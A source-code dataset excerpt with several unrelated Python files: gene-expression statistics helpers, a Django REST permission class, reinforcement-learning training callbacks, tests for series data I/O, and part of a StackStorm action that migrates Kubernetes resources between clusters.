df_fc = np.exp(df_fc)
results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
results[:] = "?"
results[np.isnan(df_de)] = "NaN"
results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
clusts = [x.rpartition(":")[2] for x in columns]
df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
return df
def show_attributes(
input_file: str,
show_attributes: bool,
show_gene_attributes: bool,
show_values_for_attributes: str,
) -> None:
data = read_input(input_file, h5ad_mode="r")
if show_attributes:
print(
"Available sample attributes in input dataset: {0}".format(
", ".join(data.obs.columns.values)
)
)
if show_gene_attributes:
print(
"Available gene attributes in input dataset: {0}".format(
", ".join(data.var.columns.values)
)
)
if not show_values_for_attributes is None:
for attr in show_values_for_attributes.split(","):
print(
"Available values for attribute {0}: {1}.".format(
attr, ", ".join(np.unique(data.obs[attr]))
)
)
def perform_oneway_anova(
data: AnnData,
glist: List[str],
restriction_vec: List[str],
group_str: str,
fdr_alpha: float = 0.05,
res_key: str = None,
) -> pd.DataFrame:
from scipy.stats import f_oneway
from statsmodels.stats.multitest import fdrcorrection as fdr
selected = np.ones(data.shape[0], dtype=bool)
for rest_str in restriction_vec:
attr, value_str = rest_str.split(":")
values = value_str.split(",")
selected = selected & np.isin(data.obs[attr], values)
gene_list = np.array(glist)
gene_list = gene_list[np.isin(gene_list, data.var_names)]
ngene = gene_list.size
newdat = data[selected, :][:, gene_list].copy()
newdat.X = newdat.X.toarray()
group_values = group_str.split(":")
group_names = []
col_names = []
ngr = 0
group_idx = None
if group_values[0] == "pseudotime":
assert len(group_values) == 3
div_by = group_values[1]
ngr = int(group_values[2])
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
pseudotimes = newdat.obs["pseudotime"].values
min_t = pseudotimes.min()
max_t = pseudotimes.max()
if div_by == "time":
interval = (max_t - min_t) / ngr
left = min_t - 1e-5
for i in range(ngr):
right = min_t + interval * (i + 1)
name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
group_names.append(name)
group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
left = right
else:
assert div_by == "size"
ords = np.argsort(pseudotimes)
quotient = ords.size // ngr
residule = ords.size % ngr
fr = 0
for i in range(ngr):
to = fr + quotient + (i < residule)
name = "[{:.2f}, {:.2f}]".format(
pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
)
group_names.append(name)
group_idx[i][ords[fr:to]] = True
fr = to
else:
assert len(group_values) == 2
group_attr = group_values[0]
tmp_str = group_values[1]
groups_str = tmp_str.split(";")
ngr = len(groups_str)
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
for i, gstr in enumerate(groups_str):
name, values = gstr.split("~")
group_names.append(name)
group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
for i in range(ngr):
print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
np.warnings.filterwarnings("ignore")
stats = np.zeros((ngene, 3 + ngr * 2))
for i in range(ngene):
arr_list = []
for j in range(ngr):
arr = newdat.X[group_idx[j], i]
stats[i, 3 + j * 2] = arr.mean()
stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
arr_list.append(arr)
stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
if np.isnan(stats[i, 0]):
stats[i, 0] = 0.0
stats[i, 1] = 1.0
passed, stats[:, 2] = fdr(stats[:, 1])
cols = ["fstat", "pval", "qval"]
for i in range(ngr):
cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
results = raw_results[raw_results["qval"] <= fdr_alpha]
results = results.sort_values("qval")
if res_key is not None:
data.uns[res_key] = raw_results
data.obs[res_key] = "background"
for i in range(ngr):
idx = np.zeros(data.shape[0], dtype=bool)
idx[selected] = group_idx[i]
data.obs.loc[idx, res_key] = group_names[i]
return results
| true
| true
|
f7190fdf620a3e284b95e4499bf5b802e62fd1c4
| 247
|
py
|
Python
|
contacts/permissions.py
|
neyona/underwaterfortunes
|
a48bedc7e25815dea87f743dae21d046d842c713
|
[
"MIT"
] | null | null | null |
contacts/permissions.py
|
neyona/underwaterfortunes
|
a48bedc7e25815dea87f743dae21d046d842c713
|
[
"MIT"
] | 1
|
2020-05-21T13:54:06.000Z
|
2020-05-21T13:54:06.000Z
|
contacts/permissions.py
|
neyona/underwaterfortunes-2020-version
|
a48bedc7e25815dea87f743dae21d046d842c713
|
[
"MIT"
] | null | null | null |
from rest_framework import permissions
class AllPostsPermissions(permissions.BasePermission):
    """Object-level permission that allows POST requests on the object.

    NOTE(review): the original body was ``return self.create(request, *args,
    **kwargs)``, which raised ``NameError`` on every POST — ``args``/``kwargs``
    are undefined here and permission classes have no ``create`` method.
    A permission hook must return a boolean instead.
    """

    def has_object_permission(self, request, add, obj):
        # Allow POST; every other method falls through to a falsy result,
        # matching the original's implicit ``None`` return for non-POST.
        return request.method == "POST"
| 27.444444
| 56
| 0.716599
|
from rest_framework import permissions
class AllPostsPermissions(permissions.BasePermission):
def has_object_permission(self, request, add, obj):
if request.method == "POST":
return self.create(request, *args, **kwargs)
| true
| true
|
f71910f3f64e997f951989fb3e889101f8494f4f
| 4,750
|
py
|
Python
|
src/callbacks.py
|
SyedAbidi1/BayesianRLForAutonomousDriving
|
290595683666bb27efba1950fa42306200d6f553
|
[
"MIT"
] | null | null | null |
src/callbacks.py
|
SyedAbidi1/BayesianRLForAutonomousDriving
|
290595683666bb27efba1950fa42306200d6f553
|
[
"MIT"
] | null | null | null |
src/callbacks.py
|
SyedAbidi1/BayesianRLForAutonomousDriving
|
290595683666bb27efba1950fa42306200d6f553
|
[
"MIT"
] | null | null | null |
import numpy as np
from rl.callbacks import Callback
class SaveWeights(Callback):
    """
    Callback to regularly save the weights of the neural network.

    The weights are only saved after an episode has ended, so not exactly at
    the specified saving frequency.

    Args:
        save_freq (int): Training steps between saves
        save_path (str): Path where the weights are saved.
    """

    def __init__(self, save_freq=10000, save_path=None):
        super(SaveWeights, self).__init__()
        self.save_freq = save_freq
        self.save_path = save_path
        self.nb_saves = 0

    def on_episode_end(self, episode_step, logs=None):
        # Guard clause: without a destination there is nothing to do.
        if self.save_path is None:
            return
        # Save on the very first episode end, and thereafter whenever at least
        # save_freq steps have passed since the previous save point.
        elapsed = self.model.step - (self.nb_saves - 1) * self.save_freq
        if self.nb_saves == 0 or elapsed >= self.save_freq:
            print("Number of steps: ", self.model.step)
            self.model.save_weights("{0}/{1}".format(self.save_path, self.model.step))
            self.nb_saves += 1
class EvaluateAgent(Callback):
    """
    Callback to evaluate agent on testing episodes.

    Results are appended to ``test_rewards.csv`` and ``test_steps.csv`` under
    ``save_path``, one row per evaluation run.

    Args:
        eval_freq (int): Training steps between evaluation runs.
        nb_eval_eps (int): Number of evaluation episodes.
        save_path (str): Path where the result is saved.
    """
    def __init__(self, eval_freq=10000, nb_eval_eps=5, save_path=None):
        super(EvaluateAgent, self).__init__()
        self.eval_freq = eval_freq
        self.nb_eval_eps = nb_eval_eps
        self.save_path = save_path
        self.nb_evaluation_runs = 0
        # Per-step logger attached to every evaluation run.
        self.store_data_callback = StoreTestEpisodeData(save_path)
        # The environment must be assigned by the caller before training starts.
        self.env = None
    def on_episode_end(self, episode_step, logs=None):  # Necessary to run testing at the end of an episode
        # Evaluate on the first episode end, then whenever at least eval_freq
        # steps have passed since the previous evaluation point.
        if (self.nb_evaluation_runs == 0 or
                self.model.step - (self.nb_evaluation_runs-1) * self.eval_freq >= self.eval_freq) \
                and self.save_path is not None:
            test_result = self.model.test(self.env, nb_episodes=self.nb_eval_eps, callbacks=[self.store_data_callback],
                                          visualize=False)
            # Append one space-separated row per run ('ab' keeps prior rows).
            with open(self.save_path + '/test_rewards.csv', 'ab') as f:
                np.savetxt(f, test_result.history['episode_reward'], newline=' ')
                f.write(b'\n')
            with open(self.save_path + '/test_steps.csv', 'ab') as f:
                np.savetxt(f, test_result.history['nb_steps'], newline=' ')
                f.write(b'\n')
            self.model.training = True  # training is set to False in test function, so needs to be reset here
            self.nb_evaluation_runs += 1
class StoreTestEpisodeData(Callback):
    """
    Callback to log statistics on the test episodes.

    Per-step actions, rewards and (optionally) Q-values are buffered in memory
    and flushed to CSV files under ``save_path`` when the episode changes.

    Args:
        save_path (str): Path where the result is saved.
    """
    def __init__(self, save_path=None):
        super(StoreTestEpisodeData, self).__init__()
        self.save_path = save_path
        # -1 marks "no episode seen yet", so the first step never flushes.
        self.episode = -1
        self.action_data = []
        self.reward_data = []
        self.q_values_data = None
    def on_step_end(self, episode_step, logs=None):
        assert(self.model.training is False)  # This should only be done in testing mode
        if logs is None:
            logs = {}
        if self.save_path is not None:
            if not logs['episode'] == self.episode:
                # Episode boundary: flush the previous episode's buffers
                # (skipped on the very first episode, when self.episode == -1).
                if not self.episode == -1:
                    with open(self.save_path + '/test_individual_reward_data.csv', 'ab') as f:
                        np.savetxt(f, self.reward_data, newline=' ')
                        f.write(b'\n')
                    with open(self.save_path + '/test_individual_action_data.csv', 'ab') as f:
                        np.savetxt(f, self.action_data, newline=' ')
                        f.write(b'\n')
                    if 'q_values_of_chosen_action' in logs:
                        with open(self.save_path + '/test_individual_qvalues_data.csv', 'ab') as f:
                            np.savetxt(f, self.q_values_data, newline='\n')
                            f.write(b'\n')
                # Start buffering the new episode with this step's values.
                self.episode = logs['episode']
                self.action_data = []
                self.reward_data = []
                self.action_data.append(logs['action'])
                self.reward_data.append(logs['reward'])
                if 'q_values_of_chosen_action' in logs:
                    self.q_values_data = []
                    self.q_values_data.append(logs['q_values_of_chosen_action'])
            else:
                # Same episode: keep accumulating.
                self.action_data.append(logs['action'])
                self.reward_data.append(logs['reward'])
                if 'q_values_of_chosen_action' in logs:
                    self.q_values_data.append(logs['q_values_of_chosen_action'])
# (removed stray non-code vandalism text that made this module a SyntaxError)
| 43.577982
| 119
| 0.592
|
import numpy as np
from rl.callbacks import Callback
class SaveWeights(Callback):
"""
Callback to regularly save the weights of the neural network.
The weights are only saved after an episode has ended, so not exactly at the specified saving frequency.
Args:
save_freq (int): Training steps between saves
save_path (str): Path where the weights are saved.
"""
def __init__(self, save_freq=10000, save_path=None):
super(SaveWeights, self).__init__()
self.save_freq = save_freq
self.save_path = save_path
self.nb_saves = 0
def on_episode_end(self, episode_step, logs=None):
if (self.nb_saves == 0 or self.model.step - (self.nb_saves - 1) * self.save_freq >= self.save_freq) \
and self.save_path is not None:
print("Number of steps: ", self.model.step)
self.model.save_weights(self.save_path + "/"+str(self.model.step))
self.nb_saves += 1
class EvaluateAgent(Callback):
"""
Callback to evaluate agent on testing episodes.
Args:
eval_freq (int): Training steps between evaluation runs.
nb_eval_eps (int): Number of evaluation episodes.
save_path (int): Path where the result is saved.
"""
def __init__(self, eval_freq=10000, nb_eval_eps=5, save_path=None):
super(EvaluateAgent, self).__init__()
self.eval_freq = eval_freq
self.nb_eval_eps = nb_eval_eps
self.save_path = save_path
self.nb_evaluation_runs = 0
self.store_data_callback = StoreTestEpisodeData(save_path)
self.env = None
def on_episode_end(self, episode_step, logs=None):
if (self.nb_evaluation_runs == 0 or
self.model.step - (self.nb_evaluation_runs-1) * self.eval_freq >= self.eval_freq) \
and self.save_path is not None:
test_result = self.model.test(self.env, nb_episodes=self.nb_eval_eps, callbacks=[self.store_data_callback],
visualize=False)
with open(self.save_path + '/test_rewards.csv', 'ab') as f:
np.savetxt(f, test_result.history['episode_reward'], newline=' ')
f.write(b'\n')
with open(self.save_path + '/test_steps.csv', 'ab') as f:
np.savetxt(f, test_result.history['nb_steps'], newline=' ')
f.write(b'\n')
self.model.training = True
self.nb_evaluation_runs += 1
class StoreTestEpisodeData(Callback):
"""
Callback to log statistics on the test episodes.
Args:
save_path (int): Path where the result is saved.
"""
def __init__(self, save_path=None):
super(StoreTestEpisodeData, self).__init__()
self.save_path = save_path
self.episode = -1
self.action_data = []
self.reward_data = []
self.q_values_data = None
def on_step_end(self, episode_step, logs=None):
assert(self.model.training is False)
if logs is None:
logs = {}
if self.save_path is not None:
if not logs['episode'] == self.episode:
if not self.episode == -1:
with open(self.save_path + '/test_individual_reward_data.csv', 'ab') as f:
np.savetxt(f, self.reward_data, newline=' ')
f.write(b'\n')
with open(self.save_path + '/test_individual_action_data.csv', 'ab') as f:
np.savetxt(f, self.action_data, newline=' ')
f.write(b'\n')
if 'q_values_of_chosen_action' in logs:
with open(self.save_path + '/test_individual_qvalues_data.csv', 'ab') as f:
np.savetxt(f, self.q_values_data, newline='\n')
f.write(b'\n')
self.episode = logs['episode']
self.action_data = []
self.reward_data = []
self.action_data.append(logs['action'])
self.reward_data.append(logs['reward'])
if 'q_values_of_chosen_action' in logs:
self.q_values_data = []
self.q_values_data.append(logs['q_values_of_chosen_action'])
else:
self.action_data.append(logs['action'])
self.reward_data.append(logs['reward'])
if 'q_values_of_chosen_action' in logs:
self.q_values_data.append(logs['q_values_of_chosen_action'])
# (removed stray non-code vandalism text that made this module a SyntaxError)
| false
| true
|
f71911522998ef6b2724c6a05886367f69c73b79
| 4,438
|
py
|
Python
|
test/test_series_io.py
|
waldo2590/thunder
|
967ff8f3e7c2fabe1705743d95eb2746d4329786
|
[
"Apache-2.0"
] | 650
|
2015-01-21T02:27:58.000Z
|
2022-03-01T11:10:44.000Z
|
test/test_series_io.py
|
gopikasula/thunder
|
967ff8f3e7c2fabe1705743d95eb2746d4329786
|
[
"Apache-2.0"
] | 264
|
2015-01-20T21:32:41.000Z
|
2021-02-28T15:39:01.000Z
|
test/test_series_io.py
|
gopikasula/thunder
|
967ff8f3e7c2fabe1705743d95eb2746d4329786
|
[
"Apache-2.0"
] | 179
|
2015-01-20T10:02:04.000Z
|
2021-02-24T12:59:58.000Z
|
import pytest
import os
import glob
import json
from numpy import arange, array, allclose, save, savetxt
from bolt import array as barray
from thunder.series.readers import fromarray, fromtext, frombinary, fromexample
pytestmark = pytest.mark.usefixtures("eng")
def test_from_array(eng):
    # Round-trip a small 4x2 int16 array through ``fromarray`` and verify
    # that shape, dtype, index, and values are all preserved.
    source = arange(8, dtype='int16').reshape((4, 2))
    series = fromarray(source, engine=eng)
    assert series.shape == (4, 2)
    assert series.dtype == 'int16'
    assert allclose(series.index, [0, 1])
    assert allclose(series.toarray(), source)
def test_from_array_bolt(eng):
a = arange(8, dtype='int16').reshape((4, 2))
if eng is not None:
b = barray(a, context=eng)
else:
b = barray(a)
data = fromarray(b, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_vector(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_index(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, index=[2, 3], engine=eng)
assert allclose(data.index, [2, 3])
def test_from_text(tmpdir, eng):
v = [[0, i] for i in range(10)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, v, fmt='%.02g')
data = fromtext(f, engine=eng)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_text_skip(tmpdir):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = [kv[0] + kv[1] for kv in zip(k, v)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, a, fmt='%.02g')
data = fromtext(f, skip=1)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[4, 2], dtype='int16', engine=eng)
assert allclose(data.shape, (4, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_binary_skip(tmpdir, eng):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = array([kv[0] + kv[1] for kv in zip(k, v)], dtype='int16')
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[10, 2], dtype='int16', skip=1, engine=eng)
assert allclose(data.shape, (10, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), v)
def test_to_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
fromarray(a, npartitions=1, engine=eng).tobinary(p)
files = [os.path.basename(f) for f in glob.glob(str(tmpdir) + '/data/*')]
assert sorted(files) == ['SUCCESS', 'conf.json', 'series-00000.bin']
with open(str(tmpdir) + '/data/conf.json', 'r') as f:
conf = json.load(f)
assert conf['shape'] == [4, 2]
assert conf['dtype'] == 'int16'
def test_to_binary_roundtrip(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_partitioned(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray([a, a], npartitions=4, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_3d(tmpdir, eng):
a = arange(16, dtype='int16').reshape((4, 2, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p, engine=eng)
assert allclose(data.toarray(), loaded.toarray())
def test_from_example(eng):
    """Smoke-test loading the bundled example datasets.

    The example data must be downloaded, so the test is skipped rather than
    silently passed — the original used a bare ``return``, which made the
    disabled test report as green and hid the dead assertions below.
    """
    pytest.skip('example datasets require an external download')
    data = fromexample('fish', engine=eng)
    assert allclose(data.toarray().shape, (76, 87, 2, 20))
    data = fromexample('mouse', engine=eng)
    assert allclose(data.toarray().shape, (64, 64, 20))
    data = fromexample('iris', engine=eng)
    assert allclose(data.toarray().shape, (150, 4))
| 31.475177
| 79
| 0.627084
|
import pytest
import os
import glob
import json
from numpy import arange, array, allclose, save, savetxt
from bolt import array as barray
from thunder.series.readers import fromarray, fromtext, frombinary, fromexample
pytestmark = pytest.mark.usefixtures("eng")
def test_from_array(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_bolt(eng):
a = arange(8, dtype='int16').reshape((4, 2))
if eng is not None:
b = barray(a, context=eng)
else:
b = barray(a)
data = fromarray(b, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_vector(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_index(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, index=[2, 3], engine=eng)
assert allclose(data.index, [2, 3])
def test_from_text(tmpdir, eng):
v = [[0, i] for i in range(10)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, v, fmt='%.02g')
data = fromtext(f, engine=eng)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_text_skip(tmpdir):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = [kv[0] + kv[1] for kv in zip(k, v)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, a, fmt='%.02g')
data = fromtext(f, skip=1)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[4, 2], dtype='int16', engine=eng)
assert allclose(data.shape, (4, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_binary_skip(tmpdir, eng):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = array([kv[0] + kv[1] for kv in zip(k, v)], dtype='int16')
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[10, 2], dtype='int16', skip=1, engine=eng)
assert allclose(data.shape, (10, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), v)
def test_to_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
fromarray(a, npartitions=1, engine=eng).tobinary(p)
files = [os.path.basename(f) for f in glob.glob(str(tmpdir) + '/data/*')]
assert sorted(files) == ['SUCCESS', 'conf.json', 'series-00000.bin']
with open(str(tmpdir) + '/data/conf.json', 'r') as f:
conf = json.load(f)
assert conf['shape'] == [4, 2]
assert conf['dtype'] == 'int16'
def test_to_binary_roundtrip(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_partitioned(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray([a, a], npartitions=4, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_3d(tmpdir, eng):
a = arange(16, dtype='int16').reshape((4, 2, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p, engine=eng)
assert allclose(data.toarray(), loaded.toarray())
def test_from_example(eng):
return
data = fromexample('fish', engine=eng)
assert allclose(data.toarray().shape, (76, 87, 2, 20))
data = fromexample('mouse', engine=eng)
assert allclose(data.toarray().shape, (64, 64, 20))
data = fromexample('iris', engine=eng)
assert allclose(data.toarray().shape, (150, 4))
| true
| true
|
f7191170b0bfdbd298bb18d8948c15bf555fe1c0
| 17,715
|
py
|
Python
|
packs/kubernetes/actions/migrate_cluster.py
|
pearsontechnology/st2contrib
|
f60ff517079b91de7ee84fdf91cd742784e2731e
|
[
"Apache-2.0"
] | 5
|
2016-10-11T11:52:53.000Z
|
2017-06-15T05:21:05.000Z
|
packs/kubernetes/actions/migrate_cluster.py
|
pearsontechnology/st2contrib
|
f60ff517079b91de7ee84fdf91cd742784e2731e
|
[
"Apache-2.0"
] | 25
|
2016-07-28T17:50:35.000Z
|
2017-09-25T09:26:18.000Z
|
packs/kubernetes/actions/migrate_cluster.py
|
pearsontechnology/st2contrib
|
f60ff517079b91de7ee84fdf91cd742784e2731e
|
[
"Apache-2.0"
] | 1
|
2017-05-05T19:12:01.000Z
|
2017-05-05T19:12:01.000Z
|
import json
import importlib
from datetime import datetime
import time
from st2actions.runners.pythonrunner import Action
def json_serial(obj):
    """JSON serializer for objects not serializable by default json code.

    Intended as the ``default=`` hook for ``json.dumps``: datetimes become
    ISO-8601 strings, everything else raises ``TypeError``.
    """
    if not isinstance(obj, datetime):
        raise TypeError("Type not serializable")
    return obj.isoformat()
class K8sMigrateAction(Action):
def run(
self,
ns_migration,
src_k8s_url,
src_k8s_password,
dst_k8s_url,
dst_k8s_password):
self.k8s_src = (
self._get_k8s_client(
'k8sv1',
'ApivApi',
src_k8s_url,
src_k8s_password),
self._get_k8s_client(
'k8sv1beta1',
'ApisextensionsvbetaApi',
src_k8s_url,
src_k8s_password))
self.k8s_dst = (
self._get_k8s_client(
'k8sv1',
'ApivApi',
dst_k8s_url,
dst_k8s_password),
self._get_k8s_client(
'k8sv1beta1',
'ApisextensionsvbetaApi',
dst_k8s_url,
dst_k8s_password))
def get_post_compare(datatype, name, **kwargs):
srcdata = self.get_data(self.k8s_src, datatype, ns=name)
try:
res = post(srcdata, datatype, ns=name)
except Exception as e:
print "Excepetion occurred when posting datatype '{0}' for namespace '{1}' to the destination K8S API. Reason: {2}".format(datatype,name,e.reason)
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print ("--------- Entering Retry Logic ----------------")
print "Re-querying desitination for datatype: '{0}'".format(datatype)
time.sleep(5) #Wait a brief moment and then query the destination again
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata: #Still not there, try a single repost
print "Retrying post to destination for datatype: '{0}'".format(datatype)
try:
res = post(srcdata, datatype, ns=name)
except Exception as e:
print "Excepetion occurred when posting datatype '{0}' for namespace '{1}' to the destination K8S API. Reason: {2}".format(datatype,name,e.reason)
time.sleep(10) #Wait a brief moment and then query the destination one last time before failing workflow
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print "Datatype '{0}' for namespace '{1}' exists on src but was not successfully migrated to destination".format(datatype,name)
raise Exception("Source Data was not created on Destination ")
#print ("Source Data:")
#print json.dumps(srcdata, sort_keys=True, indent=2, default=json_serial)
#print ("Destination Data:")
#print json.dumps(dstdata, sort_keys=True, indent=2, default=json_serial)
def post(data, datatype, **kwargs):
"""
Copy data from one cluster to another
:param object data: json object of data to be posted
:param str datatype: the type of k8s object (required)
:param str ns: k8s namespace (optional)
"""
# namespaces don't need a namespace argument when they're created
if datatype == "ns":
kwargs = {}
if datatype == "thirdparty":
print json.dumps(data, sort_keys=True, indent=2, default=json_serial)
# split third party resources and post per namespace
for tpr in data:
print "++++"
print json.dumps(tpr, sort_keys=True, indent=2, default=json_serial)
print "++++"
if 'namespace' in tpr['metadata']:
kwargs['ns'] = tpr['metadata']['namespace']
if kwargs['ns'] in ['default', 'kube-system']:
print "not migrating 3pr system ns"
return
res = self.post_data(datatype, tpr, **kwargs)
else:
print "no namespace for %s - skipping" % tpr['metadata']['name']
else:
# post data to second cluster
res = self.post_data(datatype, data, **kwargs)
return res
#print "RESP:"
#print json.dumps(res, sort_keys=True, indent=2, default=json_serial)
nsdata = self.k8s_src[0].list_namespace().to_dict()
if ns_migration == "kube-system":
print "Operating on Namespace: kube-system"
get_post_compare("secret", ns_migration)
else:
for ns in nsdata['items']:
name = ns['metadata']['name']
if name in ['default', 'test-runner', 'kube-system']:
continue
else:
print "Operating on Namespace: " + name
get_post_compare("ns", name)
get_post_compare("service", name)
get_post_compare("deployments", name)
get_post_compare("ds", name)
get_post_compare("rc", name)
get_post_compare("secret", name)
get_post_compare("ingress", name)
get_post_compare("limitrange", name)
get_post_compare("resquota", name)
def get_data(self, target, datatype, **kwargs):
"""
Given a datatype and optional namespace, requests data from a kubernetes cluster
:param str datatype: type of k8s object
:param str ns: namespace to insert data to (optional)
:return: list of dicts with k8s data structures
"""
myfunc = self._lookup_func(datatype, "list")
# lookup which api the function lives in and set that to be the api
# endpoint to use
if(myfunc in dir(target[0])):
myapi = target[0]
if(myfunc in dir(target[1])):
myapi = target[1]
# third party resources don't need a namespace argument when they're queried,
# but will when posted. best to strip it out here
if datatype == "thirdparty":
kwargs = {}
# if a namespace is set, make the function call with it. return a dict
if "ns" in kwargs:
data = getattr(myapi, myfunc)(kwargs['ns']).to_dict()
else:
data = getattr(myapi, myfunc)().to_dict()
output = []
# print "^^^^^^^^^^^^^^^^^^^^"
# print json.dumps(data, sort_keys=True, indent=2, default=json_serial)
# print "^^^^^^^^^^^^^^^^^^^^"
# a few calls return data with a slightly different structure
# we ignore this to keep consistancy when reinserting
if "items" not in data:
tmp = {}
tmp['items'] = []
tmp['items'].append(data)
data = tmp
# delete objects that shouldn't be transferred between clusters
if "items" in data:
for item in data['items']:
if "type" in item:
if item['type'] == "kubernetes.io/service-account-token":
continue
if "status" in item:
del item['status']
if "metadata" in item:
if "uid" in item['metadata']:
del item['metadata']['uid']
if "selfLink" in item['metadata']:
del item['metadata']['selfLink']
if "resourceVersion" in item['metadata']:
del item['metadata']['resourceVersion']
if "creationTimestamp" in item['metadata']:
del item['metadata']['creationTimestamp']
if "generation" in item['metadata']:
del item['metadata']['generation']
if "deletionGracePeriodSeconds" in item['metadata']:
del item['metadata']['deletionGracePeriodSeconds']
if "deletionTimestamp" in item['metadata']:
del item['metadata']['deletionTimestamp']
if "annotations" in item['metadata']:
del item['metadata']['annotations']
if "generateName" in item['metadata']:
del item['metadata']['generateName']
if "namespace" in item['metadata']:
del item['metadata']['namespace']
if "ownerReferences" in item['metadata']:
del item['metadata']['ownerReferences']
if "finalizers" in item['metadata']:
del item['metadata']['finalizers']
# if "labels" in item['metadata']:
# del item['metadata']['labels']
if "spec" in item:
if "finalizers" in item['spec']:
del item['spec']['finalizers']
if "template" in item['spec']:
if "spec" in item['spec']['template']:
if "generation" in item[
'spec']['template']['spec']:
del item['spec']['template'][
'spec']['securityContext']
if "dnsPolicy" in item['spec']['template']['spec']:
del item['spec']['template'][
'spec']['dnsPolicy']
if "terminationGracePeriodSeconds" in item[
'spec']['template']['spec']:
del item['spec']['template']['spec'][
'terminationGracePeriodSeconds']
if "restartPolicy" in item[
'spec']['template']['spec']:
del item['spec']['template'][
'spec']['restartPolicy']
if "containers" in item['spec']['template']['spec']:
for cont in item['spec']['template']['spec']['containers']:
if cont['livenessProbe'] is not None:
if "_exec" in cont['livenessProbe']:
cont['livenessProbe']['exec'] = cont['livenessProbe'].pop('_exec')
if "clusterIP" in item['spec']:
del item['spec']['clusterIP']
if "strategy" in item['spec']:
